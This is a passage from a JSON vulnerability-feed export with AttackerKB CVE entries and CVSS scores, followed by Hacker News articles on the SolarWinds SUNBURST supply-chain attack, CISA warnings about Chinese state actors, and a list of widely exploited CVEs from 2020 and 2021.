oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:52pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "attackerkb", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2020-07-30T00:00:00", "id": "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "href": "https://attackerkb.com/topics/UBKuPZwldv/cve-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:32", "description": "DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:10pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-01T00:00:00", "type": "attackerkb", "title": "CVE-2020-8515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-06-05T00:00:00", "id": "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "href": "https://attackerkb.com/topics/OTC0EHe2YO/cve-2020-8515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:33", "description": "The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In this type of occurrence, after gaining access to the system, the attacker may attempt to elevate their privileges.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:08pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-6327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2020-07-23T00:00:00", "id": "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "href": "https://attackerkb.com/topics/b3My5ZDXcf/cve-2017-6327", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-10T23:05:21", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:16", "description": "Exim unauthenticated RCE with reports that it\u2019s been used by [Sandworm since August 2019](<CVE-2019-10149>)\n\n \n**Recent assessments:** \n \n**ericalexanderorg** at May 28, 2020 4:49pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\n**gwillcox-r7** at November 04, 2020 4:03pm UTC reported:\n\nUntested POC exists\n\n[https://github.com/MNEMO-CERT/PoC\u2014CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py](<https://github.com/MNEMO-CERT/PoC--CVE-2019-10149_Exim/blob/master/PoC_CVE-2019-10149.py>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "attackerkb", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-28T00:00:00", "id": "AKB:D6CD45B9-F610-4480-99E7-80A4065DF5FD", "href": "https://attackerkb.com/topics/jDinrhSIJh/cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T07:58:54", "description": "A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-10-29T00:00:00", "id": "AKB:CCDE85CB-574C-401B-9892-9CAFDE0D120B", "href": "https://attackerkb.com/topics/GjH2GsCJaj/cve-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:41", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and 